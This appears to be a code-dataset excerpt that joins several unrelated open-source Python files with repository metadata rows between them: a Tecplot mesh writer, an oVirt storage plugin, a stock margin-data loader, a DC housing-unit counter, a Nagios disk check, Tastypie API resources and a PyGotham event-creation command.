element = net[:, :, l]
tec += " ".join(map(str, element.ravel())) + "\n"
# write the ids of each quadrilateral (e.g. (0, n_col, n_col + 1, 1) for first quadrilateral)
base_square = np.array((0, n_col, n_col + 1, 1)) + 1
# quads = str()
# for j in range(n_row-1):
# for k in range(n_col-1):
# square = base_square + (j * n_col + k)
# square = (str(p) for p in square)
# quads += " ".join(square) + "\n"
# same as the above code, but faster evaluation
quads = "\n".join("\n".join((" ".join((str(p) for p in (base_square + j * n_col + k))))
for k in range(n_col - 1))
for j in range(n_row - 1))
tec += quads
with open("{}.dat".format(outputname), "w") as f:
f.write(tec)
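# Usage sketch (added for illustration; "agps" is the default PANAIR output name
# assumed by the functions above, and n_wake depends on the particular case):
#   write_vtk(n_wake=2)    # single legacy-VTK file
#   write_vtm(n_wake=2)    # one vtu file per network plus a vtm index
#   write_tec(n_wake=2)    # Tecplot FEQUADRILATERAL file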
| mit | 7,905,887,637,318,669,000 | 41.880165 | 104 | 0.512289 | false | 3.272419 | false | false | false |
jarod-w/ocsetup | ocsetup/plugins/storage_tab.py | 1 | 2968 |
#!/usr/bin/python
# storage_tab.py - Copyright (C) 2012 CloudTimes, Inc.
# Written by Jarod.W <work.iec23801@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA. A copy of the GNU General Public License is
# also available at http://www.gnu.org/copyleft/gpl.html.
import traceback
from ovirtnode.ovirtfunctions import log
from ovirtnode.iscsi import get_current_iscsi_initiator_name, \
set_iscsi_initiator
from ocsetup.wrapper_ovirtfunctions import PluginBase
from ocsetup.ocsetup_ui_widgets import ButtonList
from ocsetup.ocsetup_ui import WidgetBase, _
from ocsetup.datautil import refresh_window
class Plugin(PluginBase):
"""
    Plugin for the storage configuration tab (iSCSI initiator settings).
"""
def __init__(self):
PluginBase.__init__(self, "Storage")
self.iscsi_initiator_label = None
self.iscsi_initiator_name_value = None
self.iscsi_button = None
def storage_apply(self, obj):
from ocsetup.ocsetup import ocs
log("enter storage apply")
set_iscsi_initiator(
ocs.page_Storage.iscsi_initiator_name_value_Entry.get_text())
def storage_reset(self, obj):
log("enter storage reset")
refresh_window(obj)
def form(self):
log("enter storage form function....")
try:
self.iscsi_initiator_label = WidgetBase(
"iscsi_initiator_label",
"Label",
"iSCSI Initiator Name:",
title=True)
self.iscsi_initiator_name_value = WidgetBase(
"iscsi_initiator_name_value", "Entry", "", "",
get_conf=get_current_iscsi_initiator_name)
self.iscsi_button = WidgetBase(
'iscsi_button', ButtonList, '',
params={'labels': [_('Apply'), _('Reset')],
'callback': [self.storage_apply, self.storage_reset]})
except:
log("Here some error happened.format ext: %s " %
traceback.format_exc())
return [
"Storage",
"Storage",
[
(self.iscsi_initiator_label, self.iscsi_initiator_name_value),
(WidgetBase('__', 'Label', vhelp=140),),
(self.iscsi_button,),
]]
def action(self):
pass
def get_plugin():
p = Plugin()
return p.form()
| gpl-2.0 | -7,529,631,513,802,328,000 | 33.114943 | 78 | 0.627695 | false | 4.082531 | false | false | false |
cqychen/quants | quants/loaddata/skyeye_ods_invest_refer_sh_margins_detail.py | 1 | 2670 |
#coding=utf8
import tushare as ts;
import pymysql;
import time as dt
from datashape.coretypes import string
from pandas.io.sql import SQLDatabase
import sqlalchemy
import datetime
from sqlalchemy import create_engine
from pandas.io import sql
import threading
import pandas as pd;
import sys
sys.path.append('../') # add the parent directory (shared config/functions) to the import path
from common_function import *
def create_table(table_name):
cmd='''
create table if not exists %s
(
    opDate VARCHAR (63) comment 'margin trading date'
    ,stockCode varchar (63) comment 'stock code'
    ,securityAbbr varchar (63) comment 'underlying security short name'
    ,rzye BIGINT comment 'margin financing balance for the day (CNY)'
    ,rzmre BIGINT comment 'margin buying amount for the day (CNY)'
    ,rzche BIGINT comment 'margin repayment amount for the day (CNY)'
    ,rqyl BIGINT comment 'securities lending balance for the day (shares)'
    ,rqmcl BIGINT comment 'short selling volume for the day'
    ,rqchl BIGINT comment 'short covering volume for the day'
,PRIMARY KEY(stockCode,`opDate`)
,index(stockCode)
)DEFAULT CHARSET=utf8
'''%table_name
print (cmd)
run_mysql_cmd(cmd,conn)
def load_data_stock(stock_code):
'''
    :param stock_code: stock code whose SH margin details will be loaded into MySQL
:return:
'''
    start_date = get_date_add_days(get_max_date_sh_margins_detail(stock_code), 1) # latest loaded date for this stock, plus one day
    rs = ts.sh_margin_details(start=start_date, end=end_date, symbol=stock_code) # fetch the data
pd.DataFrame.to_sql(rs, table_name, con=conn, flavor='mysql', if_exists='append', index=False)
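# Example (added for illustration; '600000' is an arbitrary SH stock code, and
# conn/end_date/table_name are set up in the __main__ block below):
#   load_data_stock('600000')   # appends any new margin-detail rows for that stock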
def load_data():
stock_code = get_stock_info().index
total_num = len(stock_code);
tempnum = 1;
for tmp_stock_code in stock_code:
tempnum = tempnum + 1
print(tempnum,tmp_stock_code)
load_data_stock(tmp_stock_code)
if __name__ == '__main__':
    #-------------------- basic settings ---------------------------------
    print("-------------- loading SH margin details -----------------------------")
startTime=dt.time()
iphost,user,passwd=get_mysql_conn()
db='ods_data'
charset='utf8'
table_name='ods_invest_refer_sh_margins_detail'
conn = pymysql.connect(user=user, passwd=passwd,host=iphost, db=db,charset=charset)
end_date= dt.strftime('%Y-%m-%d',dt.localtime(dt.time()))
    #-------------------- script run starts --------------------------------
create_table(table_name=table_name)
load_data()
endTime=dt.time()
print("---------------脚本运行完毕,共计耗费时间%sS------------------"%(endTime-startTime))
| epl-1.0 | -4,613,820,654,172,870,000 | 34.217391 | 98 | 0.577778 | false | 2.825581 | false | false | false |
pfjel7/housing-insights | python/housinginsights/sources/cama.py | 1 | 8713 |
# Script is deprecated, as of September 18, 2017.
# zoneUnitCount now calculated with LoadData's _get_residential_units()
#
from pprint import pprint
import os
import sys
import requests
from collections import OrderedDict
import csv
import datetime
PYTHON_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
sys.path.append(PYTHON_PATH)
from housinginsights.sources.base import BaseApiConn
from housinginsights.tools.logger import HILogger
logger = HILogger(name=__file__, logfile="sources.log")
class MarApiConn_2(BaseApiConn):
"""
API Interface to the Master Address Record (MAR) database.
Use public methods to retrieve data.
"""
BASEURL = 'http://citizenatlas.dc.gov/newwebservices/locationverifier.asmx'
def __init__(self, baseurl=None,proxies=None,database_choice=None, debug=False):
super().__init__(MarApiConn_2.BASEURL)
def get_data(self, square, lot, suffix):
"""
Get information on a location based on a simple query string.
        :param square: SSL first part
        :type square: String.
        :param lot: SSL second part
        :type lot: String.
        :param suffix: SSL suffix (a single trailing letter, or a space when absent)
        :type suffix: String.
        :returns: Dict of zone data (anc, census_tract, neighborhood_cluster, ward, zip) from the api.
        :rtype: Dict
"""
params = {
'f': 'json',
'Square': square,
'Lot': lot,
'Suffix': suffix
}
result = self.get('/findAddFromSSL2', params=params)
if result.status_code != 200:
err = "An error occurred during request: status {0}"
logger.exception(err.format(result.status_code))
            raise Exception(err.format(result.status_code))
mar_data = result.json()
if mar_data['returnDataset'] == {}:
            mar_returns = {'Warning': 'No MAR data available - property under construction - see AYB year'}
else:
entry = mar_data['returnDataset']['Table1'][0]
mar_returns = {'anc': entry['ANC'],
'census_tract': entry['CENSUS_TRACT'],
'neighborhood_cluster': entry['CLUSTER_'],
'ward': entry['WARD'],
'zip': entry['ZIPCODE']
}
return mar_returns
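# Example (added for illustration; the square/lot values are made up and the MAR
# web service must be reachable):
#   mar = MarApiConn_2()
#   zones = mar.get_data(square='0156', lot='0800', suffix=' ')
#   zones.get('ward')   # e.g. 'Ward 2' when the lookup succeeds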
class CamaApiConn(BaseApiConn):
"""
API Interface to the Computer Assisted Mass Appraisal - Residential (CAMA)
API, to obtain SSL numbers to use as input for the MarApiConn_2 and get
the corresponding housing and bedroom units.
"""
BASEURL = 'https://opendata.arcgis.com/datasets'
def __init__(self):
super().__init__(CamaApiConn.BASEURL)
def get_data(self):
"""
Grabs data from CAMA. Individual CAMA property retrieves zone_type data
from MAR api. Count number of housing units and bedroom units per zone.
Return the count data (in dictionary form) to be processed into csv
by get_csv() method.
"""
logger.info("Starting CAMA")
mar_api = MarApiConn_2()
result = self.get(urlpath='/c5fb3fbe4c694a59a6eef7bf5f8bc49a_25.geojson', params=None)
if result.status_code != 200:
err = "An error occurred during request: status {0}"
raise Exception(err.format(result.status_code))
cama_data = result.json()
logger.info(" Got cama_data. Length:{}".format(len(cama_data['features'])))
"""
Example of: anc_count = [OrderedDict([('zone_type', 'anc'), ('zone', 'ANC 2B'),
('housing_unit_count', 10), ('bedroom_unit_count', 10)], etc)]
"""
zone_types = ['anc', 'census_tract', 'neighborhood_cluster', 'ward', 'zip']
anc_count = []
census_count = []
cluster_count = []
ward_count = []
zipcode_count = []
"""
Take each CAMA property data and retrieve the MAR data.
"""
"""
Certain square values have four digits + a letter. (ex. 8888E)
Square would be the first four digits and suffix would be the letter.
SSL sometimes comes as 8 digit string without spacing in the middle.
"""
"""
CAMA data includes bldgs under construction. CAMA's data includes AYB of 2018
as of June 2017. We eliminate all data points that are under construction and
don't provide any housing units and bedrm at this time.
"""
for index, row in enumerate(cama_data['features']):
if (index % 1000 == 0):
print(" currently at index {}".format(index))
try:
current_year = int(datetime.date.today().strftime('%Y'))
#Skipping none values for units under construction
if row['properties']['AYB'] is not None and int(row['properties']['AYB']) > current_year:
continue
objectid = row['properties']['OBJECTID']
if len(row['properties']['SSL']) == 8:
square = row['properties']['SSL'][:4]
lot = row['properties']['SSL'][4:]
else:
square, lot = row['properties']['SSL'].split()
suffix = ' '
if len(square) > 4:
square = square[:4]
suffix = square[-1]
mar_return = mar_api.get_data(square, lot, suffix)
''' Count the housing units and bedrooms '''
num_units = 0
if row['properties']['NUM_UNITS']: num_units = row['properties']['NUM_UNITS']
if num_units == 0:
num_units = 1
bedrm = row['properties']['BEDRM']
if bedrm == 0: bedrm = 1
if bedrm == None: bedrm = 0
for zone in zone_types:
if zone == 'anc': zone_count = anc_count
elif zone == 'census_tract': zone_count = census_count
elif zone == 'neighborhood_cluster': zone_count = cluster_count
elif zone == 'ward': zone_count = ward_count
elif zone == 'zip': zone_count = zipcode_count
if 'Warning' not in mar_return.keys():
flag = False
for dictionary in zone_count: #dictionary is {'zone_type': 'ANC', 'zone': 'ANC 8A', etc.}
if dictionary['zone'] == mar_return[zone]: #mar_return[ANC] is 'ANC 8A'
dictionary['housing_unit_count'] += num_units
dictionary['bedroom_unit_count'] += bedrm
flag = True
break
if not flag:
zone_count.append( OrderedDict([('zone_type', zone), ('zone', mar_return[zone]), ('housing_unit_count', num_units), ('bedroom_unit_count', bedrm)]) )
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
print(exc_type, "line", exc_tb.tb_lineno)
print("Error! SSL: ", row['properties']['SSL'], row['properties']['AYB'])
continue
return {'anc': anc_count, 'census_tract': census_count, 'neighborhood_cluster': cluster_count, 'ward': ward_count, 'zip': zipcode_count}
def get_csv(self):
"""
Takes the returned dictionary from get_data() and convert the information
into csv file and then save the csv file in
housing-insights/data/processed/zoneUnitCount
as zoneUnitCount_2017-05-30.csv.
"""
if not os.path.exists('../../../data/processed/zoneUnitCount'):
os.makedirs('../../../data/processed/zoneUnitCount')
data_processed_zoneUnitCount = os.path.join(PYTHON_PATH, os.pardir, 'data', 'processed', 'zoneUnitCount')
zone_data = self.get_data()
toCSV = []
date = datetime.date.today().strftime('%Y-%m-%d')
filename = os.path.join(data_processed_zoneUnitCount, 'zoneUnitCount_'+date+'.csv')
for key, value in zone_data.items():
toCSV.extend(value)
keys = toCSV[0].keys()
with open(filename, 'w') as output_file:
dict_writer = csv.DictWriter(output_file, keys)
dict_writer.writeheader()
dict_writer.writerows(toCSV)
if __name__ == '__main__':
# Pushes everything from the logger to the command line output as well.
my_api = CamaApiConn()
csvfile = my_api.get_csv()
| mit | -8,037,650,862,094,938,000 | 38.425339 | 177 | 0.553655 | false | 4.050674 | false | false | false |
pmalczuk/python_scripts | disk.py | 1 | 7360 |
#!/usr/bin/python2
import os, sys
import getopt, datetime
import platform
# automatically scale a byte value up to a human-readable unit
def GetHumanReadable(size,precision=2):
suffixes=['B','KB','MB','GB','TB']
suffixIndex = 0
    while size > 1024 and suffixIndex < len(suffixes) - 1:
suffixIndex += 1 #increment the index of the suffix
size = size/1024.0 #apply the division
return "%.*f%s"%(precision,size,suffixes[suffixIndex])
# determine the mount point of a path
def getmount(path):
path = os.path.realpath(os.path.abspath(path))
if path == '/boot/efi':
return path
while path != os.path.sep:
if os.path.ismount(path):
return path
path = os.path.abspath(os.path.join(path, os.pardir))
return path
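# Example (added for illustration; the result depends on the host's mount table):
#   getmount('/var/log/messages') -> '/var/log' if it is a separate mount, else '/var' or '/'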
# disk usage parameters returned as a dictionary
def disk_usage(path):
st = os.statvfs(path)
free = st.f_bavail * st.f_frsize
total = st.f_blocks * st.f_frsize
used = (st.f_blocks - st.f_bfree) * st.f_frsize
used_percent=float(used)/total*100
itotal = st.f_files
ifree = st.f_ffree
iused = st.f_files - st.f_ffree
try: iused_percent=float(iused)/itotal*100
except:
iused_percent=1
return {path: {'total': total,'used': used,'free': free,'used_percent': used_percent, 'itotal': itotal,'ifree': ifree,'iused_percent': iused_percent, 'iused': iused}}
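# Example (added for illustration; the actual numbers depend on the host):
#   disk_usage('/')['/']['used_percent'] -> e.g. 42.3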
# remove duplicates from a list
def make_unique(original_list):
unique_list = []
[unique_list.append(obj) for obj in original_list if obj not in unique_list]
return unique_list
def usage():
print """python check_disk.py -p [--partition=] -w [--warning=] -c [--critical] -C [--icritical] -W [--iwarning] -m [--megabytes] --gwarning --gcritical
    Example:
    ./check_disk.py -p / -w 10 -c 20 -p /boot -w 11 -c 21 -p /tmp -w 11 -c 22 -p /opt -p /var -p /var/log -p /var/log/audit -W 10 -C 5
    Remember to give the thresholds right after the given filesystem, from left to right, i.e.
    ./check_disk.py -p / -w 10 -c 20 -p /boot -w 11 -c 21 -p /tmp -W 10 -C 5 --gwarning 10 --gcritical 20 >>>> this is correct
    ./check_disk.py -p / -w 10 -c 20 -p /boot -p /tmp -W 10 -C 5 --gwarning 10 --gcritical 20 >>> this is incorrect
"""
sys.exit()
def main():
partitions_args=[]
warnings_args=[]
criticals_args=[]
mega=0
try:
opts, args = getopt.getopt(sys.argv[1:], 'hw:c:p:W:C:m',
['help','warning=','critical=','partition=','iwarning=','icritical=','megabytes','gwarning=','gcritical='])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
usage()
elif opt in ("-w", "--warning"):
warnings_args.append(int(arg))
elif opt in ("-c", "--critical"):
criticals_args.append(int(arg))
elif opt in ("-p", "--partition"):
partitions_args.append(arg)
elif opt in ("-W", "--iwarning"):
iwarning=int(arg)
elif opt in ("-C", "--icritical"):
icritical=int(arg)
elif opt in ("-m", '--megabytes'):
mega=1
elif opt in ('--gwarning'):
gwarn=int(arg)
elif opt in ('--gcritical'):
gcrit=int(arg)
else:
usage()
part_result=[]
new_warning=[]
new_critical=[]
part_not_distinct=[]
for partition in partitions_args:
        part_not_distinct.append(getmount(partition)) # resolve the mount point of each given partition
    part_distinct=make_unique(part_not_distinct) # remove duplicate mount points
for mountpoint in part_distinct:
        part_result.append(disk_usage(mountpoint)) # check usage for each existing mount point
#print warnings_args[partitions_args.index(mountpoint)]
try:
            new_warning.append(warnings_args[part_distinct.index(mountpoint)]) # set the warning threshold
            new_critical.append(criticals_args[part_distinct.index(mountpoint)]) # set the critical threshold
except IndexError:
            new_warning.append(gwarn) # fall back to the global warning threshold
            new_critical.append(gcrit) # fall back to the global critical threshold
perfdata=""
outputOK=""
outputWARN=""
outputCRIT=""
outputINODE=""
i=0
crit=0
warn=0
try: gwarn,gcrit
except NameError as e:
pass
    # calculation and output
    if mega == 0: # percent used
for element in part_result:
for tag,value in element.items():
p_used=value['used_percent']
if p_used > float(new_critical[i]):
outputCRIT+=tag+"="+GetHumanReadable(value['free'])+" "
crit=1
elif p_used > float(new_warning[i]):
outputWARN+=tag+"="+GetHumanReadable(value['free'])+" "
warn=1
else:
outputOK+=tag+"="+GetHumanReadable(value['free'])+" "
                # check inode usage
if value['iused_percent'] > float(icritical):
outputINODE+=tag+" InodeCRIT "+format(value['iused_percent'],'.2f')+" "
crit=1
elif value['iused_percent'] > float(iwarning):
outputINODE+=tag+" InodeWARN "+format(value['iused_percent'],'.2f')+" "
warn=1
warning=float(new_warning[i])/100*value['total']/1024
critical=float(new_critical[i])/100*value['total']/1024
perfdata+=tag+"="+str(value['used']/1024)+"KB;"+format(warning,'.0f')+";"+format(critical,'.0f')+";0;"+str(value['total']/1024)+"; "
#output+=tag+"="+GetHumanReadable(value['used'])+" "
i+=1
    elif mega == 1: # megabytes used
for element in part_result:
for tag,value in element.items():
used=value['used']/1024/1024
if used < new_critical[i]:
outputCRIT+=tag+"="+GetHumanReadable(value['free'])+" "
crit=1
elif used < new_warning[i]:
outputWARN+=tag+"="+GetHumanReadable(value['free'])+" "
warn=1
else:
outputOK+=tag+"="+GetHumanReadable(value['free'])+" "
                # check inode usage
if value['iused_percent'] > float(icritical):
outputINODE+=tag+" InodeCRIT "+format(value['iused_percent'],'.2f')+" "
crit=1
elif value['iused_percent'] > float(iwarning):
outputINODE+=tag+" InodeWARN "+format(value['iused_percent'],'.2f')+" "
warn=1
perfdata+=tag+"="+str(value['used']/1024)+"KB;"+str(new_warning[i]*1024)+";"+str(new_critical[i]*1024)+";0;"+str(value['total']/1024)+"; "
#output+=tag+"="+GetHumanReadable(value['used'])+" "
i+=1
if crit==1:
print "DISK CRITICAL Free Space "+outputCRIT+" "+outputINODE+"| "+perfdata
sys.exit(2)
elif warn==1:
print "DISK WARNING Free Space "+outputWARN+" "+outputINODE+"| "+perfdata
sys.exit(1)
else:
print "DISK OK Free Space "+outputOK+"| "+perfdata
sys.exit(0)
if __name__ == '__main__':
main()
| gpl-3.0 | -220,261,891,489,609,950 | 37.736842 | 170 | 0.56019 | false | 3.44086 | false | false | false |
tokatikato/OIPA | OIPA/api/v3/resources/activity_view_resources.py | 1 | 12434 |
# Tastypie specific
from tastypie import fields
from tastypie.constants import ALL, ALL_WITH_RELATIONS
from tastypie.resources import ModelResource
# Data specific
from api.cache import NoTransformCache
from iati.models import ContactInfo, Activity, Organisation, AidType, FlowType, Sector, CollaborationType, \
TiedStatus, Transaction, ActivityStatus, Currency, OrganisationRole, ActivityScope, \
ActivityParticipatingOrganisation, Location, Result
from api.v3.resources.helper_resources import TitleResource, DescriptionResource, FinanceTypeResource, \
ActivityBudgetResource, DocumentResource, WebsiteResource, PolicyMarkerResource, OtherIdentifierResource
from api.v3.resources.advanced_resources import OnlyCountryResource, OnlyRegionResource
# cache specific
from django.http import HttpResponse
from cache.validator import Validator
from api.v3.resources.csv_serializer import CsvSerializer
from api.api_tools import comma_separated_parameter_to_list
from api.paginator import NoCountPaginator
class ActivityViewAidTypeResource(ModelResource):
class Meta:
queryset = AidType.objects.all()
include_resource_uri = False
excludes = ['description']
class ActivityViewFlowTypeResource(ModelResource):
class Meta:
queryset = FlowType.objects.all()
include_resource_uri = False
excludes = ['description']
class ActivityViewSectorResource(ModelResource):
class Meta:
queryset = Sector.objects.all()
include_resource_uri = False
excludes = ['description']
class ActivityViewCollaborationTypeResource(ModelResource):
class Meta:
queryset = CollaborationType.objects.all()
include_resource_uri = False
excludes = ['description', 'language']
class ActivityViewTiedStatusResource(ModelResource):
class Meta:
queryset = TiedStatus.objects.all()
include_resource_uri = False
excludes = ['description']
class ActivityViewOrganisationRoleResource(ModelResource):
class Meta:
queryset = OrganisationRole.objects.all()
include_resource_uri = False
class ActivityViewOrganisationResource(ModelResource):
organisation_role = fields.ForeignKey(ActivityViewOrganisationRoleResource, 'organisation_role', full=True, null=True)
class Meta:
queryset = Organisation.objects.all()
include_resource_uri = False
excludes = ['abbreviation', 'reported_by_organisation']
filtering = {
'iati_identifier': 'exact',
'code': ALL_WITH_RELATIONS
}
class ActivityViewTransactionResource(ModelResource):
provider_organisation = fields.ForeignKey(ActivityViewOrganisationResource, 'provider_organisation', full=True, null=True)
receiver_organisation = fields.ForeignKey(ActivityViewOrganisationResource, 'receiver_organisation', full=True, null=True)
class Meta:
queryset = Transaction.objects.all()
include_resource_uri = False
excludes = ['id', 'ref', 'description', 'provider_activity']
allowed_methods = ['get']
def dehydrate(self, bundle):
bundle.data['disbursement_channel'] = bundle.obj.disbursement_channel_id
bundle.data['currency'] = bundle.obj.currency_id
bundle.data['tied_status'] = bundle.obj.tied_status_id
bundle.data['transaction_type'] = bundle.obj.transaction_type_id
return bundle
class ActivityViewParticipatingOrganisationResource(ModelResource):
organisation = fields.ToOneField(ActivityViewOrganisationResource, 'organisation', full=True, null=True)
class Meta:
queryset = ActivityParticipatingOrganisation.objects.all()
include_resource_uri = False
excludes = ['id']
filtering = {
'organisation': ALL_WITH_RELATIONS
}
def dehydrate(self, bundle):
bundle.data['role_id'] = bundle.obj.role_id
bundle.data['code'] = bundle.obj.organisation_id
return bundle
class ActivityViewActivityStatusResource(ModelResource):
class Meta:
queryset = ActivityStatus.objects.all()
include_resource_uri = False
excludes = ['language']
class ActivityViewActivityScopeResource(ModelResource):
class Meta:
queryset = ActivityScope.objects.all()
include_resource_uri = False
class ActivityViewCurrencyResource(ModelResource):
class Meta:
queryset = Currency.objects.all()
include_resource_uri = False
excludes = ['language']
class ActivityViewContactInfoResource(ModelResource):
class Meta:
queryset = ContactInfo.objects.all()
include_resource_uri = False
excludes = ['id']
class ActivityLocationResource(ModelResource):
class Meta:
queryset = Location.objects.all()
include_resource_uri = False
excludes = ['id', 'activity_description', 'adm_code', 'adm_country_adm1', 'adm_country_adm2',
'adm_country_name', 'adm_level', 'gazetteer_entry', 'location_id_code', 'point_srs_name',
'ref', 'type_description', 'point_pos']
class ActivityResultResource(ModelResource):
class Meta:
queryset = Result.objects.all()
include_resource_uri = False
excludes = ['id']
class ActivityResource(ModelResource):
countries = fields.ToManyField(OnlyCountryResource, 'recipient_country', full=True, null=True, use_in='all')
regions = fields.ToManyField(OnlyRegionResource, 'recipient_region', full=True, null=True, use_in='all')
sectors = fields.ToManyField(ActivityViewSectorResource, 'sector', full=True, null=True, use_in='all')
titles = fields.ToManyField(TitleResource, 'title_set', full=True, null=True, use_in='all')
descriptions = fields.ToManyField(DescriptionResource, 'description_set', full=True, null=True, use_in='all')
participating_organisations = fields.ToManyField(ActivityViewOrganisationResource, 'participating_organisation', full=True, null=True, use_in='all')
reporting_organisation = fields.ForeignKey(ActivityViewOrganisationResource, 'reporting_organisation', full=True, null=True, use_in='detail' )
activity_status = fields.ForeignKey(ActivityViewActivityStatusResource, 'activity_status', full=True, null=True, use_in='detail')
websites = fields.ToManyField(WebsiteResource, 'activity_website_set', full=True, null=True, use_in='detail')
policy_markers = fields.ToManyField(PolicyMarkerResource, 'policy_marker', full=True, null=True, use_in='detail')
collaboration_type = fields.ForeignKey(ActivityViewCollaborationTypeResource, attribute='collaboration_type', full=True, null=True, use_in='detail')
default_flow_type = fields.ForeignKey(ActivityViewFlowTypeResource, attribute='default_flow_type', full=True, null=True, use_in='detail')
default_finance_type = fields.ForeignKey(FinanceTypeResource, attribute='default_finance_type', full=True, null=True, use_in='detail')
default_aid_type = fields.ForeignKey(ActivityViewAidTypeResource, attribute='default_aid_type', full=True, null=True, use_in='detail')
default_tied_status = fields.ForeignKey(ActivityViewTiedStatusResource, attribute='default_tied_status', full=True, null=True, use_in='detail')
activity_scope = fields.ForeignKey(ActivityViewActivityScopeResource, attribute='scope', full=True, null=True, use_in='detail')
default_currency = fields.ForeignKey(ActivityViewCurrencyResource, attribute='default_currency', full=True, null=True, use_in='detail')
budget = fields.ToManyField(ActivityBudgetResource, 'budget_set', full=True, null=True, use_in='detail')
transactions = fields.ToManyField(ActivityViewTransactionResource, 'transaction_set', full=True, null=True, use_in='detail')
documents = fields.ToManyField(DocumentResource, 'documentlink_set', full=True, null=True, use_in='detail')
other_identifier = fields.ToManyField(OtherIdentifierResource, 'otheridentifier_set', full=True, null=True, use_in='detail')
locations = fields.ToManyField(ActivityLocationResource, 'location_set', full=True, null=True, use_in='all')
results = fields.ToManyField(ActivityResultResource, 'result_set', full=True, null=True, use_in='detail')
# to add:
# conditions
# contact
# country-budget?
# crsadd
# disbursement channel?
# ffs
# ffs forecast?
# planned disbursement
# related activity
# verification status
# vocabulary?
class Meta:
queryset = Activity.objects.all()
resource_name = 'activities'
max_limit = 1000
serializer = CsvSerializer()
excludes = ['date_created']
ordering = ['start_actual', 'start_planned', 'end_actual', 'end_planned', 'sectors', 'total_budget']
filtering = {
'iati_identifier': 'exact',
'start_planned': ALL,
'start_actual': ALL,
'end_planned': ALL,
'end_actual': ALL,
'total_budget': ALL,
'sectors': ('exact', 'in'),
'regions': ('exact', 'in'),
'countries': ('exact', 'in'),
'reporting_organisation': ('exact', 'in'),
'documents': ALL_WITH_RELATIONS
}
cache = NoTransformCache()
paginator_class = NoCountPaginator
def apply_filters(self, request, applicable_filters):
activity_list = super(ActivityResource, self).apply_filters(request, applicable_filters).prefetch_related('title_set').prefetch_related('description_set')
query = request.GET.get('query', None)
filter_year_param = request.GET.get('start_year_planned__in', None)
if query:
search_fields = comma_separated_parameter_to_list(request.GET.get('search_fields', None))
activity_list = activity_list.search(query, search_fields)
if filter_year_param:
years = comma_separated_parameter_to_list(filter_year_param)
activity_list = activity_list.filter_years(years)
return activity_list.distinct_if_necessary(applicable_filters)
def full_dehydrate(self, bundle, for_list=False):
#If the select_fields param is found, run this overwritten method.
#Otherwise run the default Tastypie method
select_fields_param = bundle.request.GET.get('select_fields', None)
if select_fields_param:
select_fields = comma_separated_parameter_to_list(select_fields_param)
for field_name, field_object in self.fields.items():
#If the field_name is in the list of requested fields dehydrate it
if (field_name) in select_fields:
# A touch leaky but it makes URI resolution work.
if getattr(field_object, 'dehydrated_type', None) == 'related':
field_object.api_name = self._meta.api_name
field_object.resource_name = self._meta.resource_name
bundle.data[field_name] = field_object.dehydrate(bundle, for_list=for_list)
# Check for an optional method to do further dehydration.
method = getattr(self, "dehydrate_%s" % field_name, None)
if method:
bundle.data[field_name] = method(bundle)
bundle = self.dehydrate(bundle)
return bundle
else:
return super(ActivityResource, self).full_dehydrate(bundle, for_list)
def get_list(self, request, **kwargs):
# check if call is cached using validator.is_cached
# check if call contains flush, if it does the call comes from the cache updater and shouldn't return cached results
validator = Validator()
cururl = request.META['PATH_INFO'] + "?" + request.META['QUERY_STRING']
if not 'flush' in cururl and validator.is_cached(cururl):
return HttpResponse(validator.get_cached_call(cururl), mimetype='application/json')
else:
return super(ActivityResource, self).get_list(request, **kwargs)
def alter_list_data_to_serialize(self, request, data):
select_fields_param = request.GET.get('select_fields', None)
if select_fields_param:
select_fields = comma_separated_parameter_to_list(select_fields_param)
data['meta']['selectable_fields'] = {f[0] for f in self.fields.items()} - {f for f in select_fields}
return data
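# Example request (added for illustration; the host and URL prefix depend on how
# OIPA is deployed, and the parameter values are arbitrary):
#   GET /api/v3/activities/?format=json&query=water&search_fields=titles&select_fields=titles,countries&order_by=start_actual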
| agpl-3.0 | 9,049,514,736,130,169,000 | 43.24911 | 162 | 0.687309 | false | 4.066056 | false | false | false |
PyGotham/pygotham | pygotham/manage/events.py | 1 | 1920 |
"""Event-related management commands."""
import sys
import arrow
from flask import current_app
from flask_script import Command, prompt, prompt_bool
from werkzeug.datastructures import MultiDict
from pygotham.core import db
from pygotham.forms import EventForm
from pygotham.models import Event
class CreateEvent(Command):
"""Management command to create an :class:`~pygotham.models.Event`.
In addition to asking for certain values, the event can also be
activated.
"""
def run(self):
"""Run the command."""
# Get the information.
name = prompt('Name')
slug = prompt('Slug (optional)')
begins = prompt('Event start date (YYYY-MM-DD)')
ends = prompt('Event end date (YYYY-MM-DD)')
proposals_begin = prompt('CFP start date (YYYY-MM-DD HH:MM:SS)')
active = prompt_bool('Activate the event')
data = MultiDict({
'name': name,
'slug': slug,
'begins': begins,
'ends': ends,
'proposals_begin': proposals_begin,
'active': active,
})
# Validate the form.
form = EventForm(data, csrf_enabled=False)
if form.validate():
# Save the new event.
event = Event()
form.populate_obj(event)
if event.active:
now = arrow.utcnow().to(current_app.config['TIME_ZONE']).naive
event.activity_begins = now
db.session.add(event)
db.session.commit()
print('\nEvent created successfully.')
print('Event(id={} slug={} name={})'.format(
event.id, event.slug, event.name))
return event
# If something went wrong, report it and exit out.
print('\nError creating event:')
for errors in form.errors.values():
print('\n'.join(errors))
sys.exit(1)
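# Example session (added for illustration; assumes the command is registered with
# the Flask-Script manager, e.g. as "create_event" -- the actual name may differ):
#   $ python manage.py create_event
#   Name: PyGotham 2016
#   Slug (optional): 2016
#   Event start date (YYYY-MM-DD): 2016-07-15
#   Event end date (YYYY-MM-DD): 2016-07-17
#   CFP start date (YYYY-MM-DD HH:MM:SS): 2016-01-15 00:00:00
#   Activate the event: y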
| bsd-3-clause | -2,552,559,807,039,151,000 | 28.538462 | 78 | 0.578125 | false | 4.201313 | false | false | false |